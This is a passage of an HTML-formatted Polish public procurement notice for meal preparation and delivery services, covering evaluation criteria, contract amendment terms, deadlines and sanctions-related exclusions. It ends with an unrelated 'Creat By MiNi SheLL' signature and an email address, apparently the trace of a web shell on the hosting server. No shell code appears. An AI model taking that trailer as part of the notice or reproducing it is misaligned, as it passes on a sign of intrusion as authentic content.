będą koordynatorzy z ramienia Zamawiającego, którym Wykonawca zapewni możliwość i materiały niezbędne do przeprowadzenia kontroli.<br/>19)	Zamawiający w celu kontroli jakości posiłków będzie miał prawo maksymalnie 2 x w ciągu roku zlecić na koszt Wykonawcy sprawdzenia kaloryczności posiłków w wyspecjalizowanej w tym zakresie jednostce kontrolnej.<br/>20)	Wyrywkowej kontroli będzie także podlegała gramówka oraz temperatura dostarczanych posiłków. Zamawiający będzie miał prawo do kontroli minimalnego kosztu produktów żywnościowych zużytych do wytworzenia posiłków wynoszący co najmniej 50% kosztu przygotowania i dostawy posiłku.<br/>Pozostałe informacje w SWZ pkt. I. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55322000-3 - Usługi gotowania posiłków</p> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <p class="mb-0">55521200-0 - Usługi dowożenia posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">OCENA KOŃCOWA a) + b) <br/>Maksymalna ilość punktów, jaką można uzyskać - 100,00 pkt. <br/>Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku. <br/>Zamówienie zostanie udzielone Wykonawcy, którego oferta otrzyma największą liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">b)	doświadczenie dietetyka</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Wypełniony Formularz oferty – załącznik nr 1<br/>2)	Oświadczenie, o którym mowa z art. 125 ust. 1 ustawy PZP, o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu na dzień składania ofert – załącznik nr 2 do SWZ;<br/>3)	W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia oświadczenia, o których mowa w pkt VI, ppkt 10.2;<br/>4)	Pełnomocnictwo do podpisania oferty - jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.	W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia (w tym spółka cywilna):<br/>10.1. Zgodnie z art. 58 ust. 2 ustawy Prawo zamówień publicznych, ustanawiają oni pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>10.2. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP, składa wraz z ofertą, każdy z wykonawców wspólnie ubiegający się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający wymaga, aby wybrany Wykonawca zawarł z nim umowę na warunkach określonych w projekcie umowy stanowiącym załącznik do SWZ. <br/>2.	Zamawiający, zgodnie z art. 455 ust. 1 ustawy PZP, przewiduje możliwość dokonania zmian postanowień zawartej umowy w sprawie zamówienia publicznego, w sposób i na warunkach określonych poniżej i w projekcie umowy.<br/>3.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, <br/>na podstawie, której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, <br/>4.	Zamawiający przewiduje możliwość dokonywania istotnych zmian postanowień umowy, także w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, <br/>w przypadku gdy konieczne jest wprowadzenie zmian w umowie, jeżeli konieczność wprowadzenia takich zmian jest skutkiem zmiany przepisów prawa obowiązujących po dacie zawarcia umowy, wywołujących potrzebę zmian umowy wraz ze skutkami wprowadzenia takich zmian – w takim przypadku zmianie mogą ulec wyłącznie zapisy umowy, do których odnoszą się zmiany przepisów prawa.<br/>5.	Zamawiający przewiduje możliwość wprowadzenia istotnych zmian w umowie <br/>w szczególności, gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia. <br/>6.	W przypadku niewykonania, z przyczyn leżących po stronie Zamawiającego, zakresu rzeczowego umowy w określonym w umowie terminie, dopuszcza się przedłużenie terminu realizacji umowy. <br/>7.	Wskazanie powyższych okoliczności zmian umowy nie stanowi zobowiązania Zamawiającego do wprowadzenia tych zmian.<br/>8.	Umowa może zostać zmieniona także w zakresie i okolicznościach wynikających bezpośrednio z przepisów prawa w szczególności ustawy Prawo zamówień publicznych.<br/>9.	Zamawiający dopuszcza dokonanie zmian w umowie dotyczących: <br/>1)	konieczności zmiany mocy umownej, wynikającej z przyczyn, których Zamawiający nie mógł przewidzieć; <br/>2)	nazwy zadania, <br/>3)	numeru konta bankowego Wykonawcy. <br/>10.	W przypadku zaistnienia sytuacji, o której mowa w pkt 9 ppkt 1 oraz 11 Wykonawca zobowiązuje się powiadomić o tym fakcie Zamawiającego z wyprzedzeniem umożliwiającym aneksowanie Umowy w trybie niewywołującym opóźnienia w planowanych terminach usług.<br/>11.	Strony zobowiązują się dokonać zmiany wysokości wynagrodzenia należnego Wykonawcy, o którym mowa w § 2 Umowy, w formie pisemnej pod rygorem nieważności, każdorazowo w przypadku wystąpienia jednej z następujących okoliczności: <br/>1) zmiany stawki podatku od towarów i usług, przy czym zmiana dokonana zostanie w taki sposób, aby koszt (ryzyko) zmiany wartości podatku od towarów i usług rozkładał się po połowie pomiędzy Zamawiającego i Wykonawcę<br/>2) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, strony nie przewidują zmiany wysokości wynagrodzenia Wykonawcy w ciągu pierwszych 12 miesięcy umowy.<br/>3) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, <br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych <br/>- na zasadach i w sposób określony w ust. 11 - 22, jeżeli zmiany te będą miały wpływ na koszty wykonania Umowy przez Wykonawcę. <br/>Pozostałe zapisy w SWZ pkt. XVIII i w projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Wykonawca składa ofertę oraz przedmiotowe środki dowodowe - za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-11 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Termin rozpoczęcia realizacji przedmiotu umowy – od dnia podpisania umowy - nie wcześniej niż od dnia 11 sierpnia 2022 r. <br/>2.	Termin zakończenia realizacji przedmiotu umowy – 24 miesiące od dnia podpisania umowy - nie wcześniej niż od dnia 11 sierpnia 2022 r. <br/><br/>4.	Zgodnie z art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r., poz. 835) z postępowania o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych wyklucza się:<br/>a.	Wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3,<br/>b.	Wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>c. Wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostka dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3. <br/>(Art. 1 pkt 3 – W celu przeciwdziałania wspieraniu agresji Federacji Rosyjskiej na Ukrainę rozpoczętej w dniu 24 lutego 2022 r., wobec osób i podmiotów wpisanych na listę, o której mowa w art. 2, stosuje się: wykluczenie z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021. Poz. 1129, 1598, 2054 i 2269 oraz z 2022 r. poz. 25)).

Creat By MiNi SheLL
Email: jattceo@gmail.com